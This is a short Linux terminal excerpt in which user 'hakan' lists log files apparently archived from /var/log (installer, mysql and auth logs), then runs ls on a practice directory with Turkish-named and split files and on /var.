var/log/installer/initial-status.gz
var/log/installer/version
var/log/installer/debug
var/log/installer/partman
var/log/installer/casper.log
var/log/installer/syslog
var/log/installer/media-info
var/log/mysql.log.4.gz
var/log/pm-suspend.log
var/log/mysql.err
var/log/auth.log.2.gz
var/log/dbconfig-common/
var/log/dbconfig-common/dbc.log
var/log/auth.log.1
var/log/dmesg
var/log/vbox-install.log
var/log/wtmp.1
var/log/bootstrap.log
var/log/dmesg.3.gz
hakan paste # ls
dosya1 dosya3 log.tar.gz var xab xad xaf xah
dosya2 dosya4 ornek    xaa xac xae xag yenidosya
hakan paste # cd /var/
hakan var # ls
backups cache lib local lock log mail opt run spool tmp www
hakan var #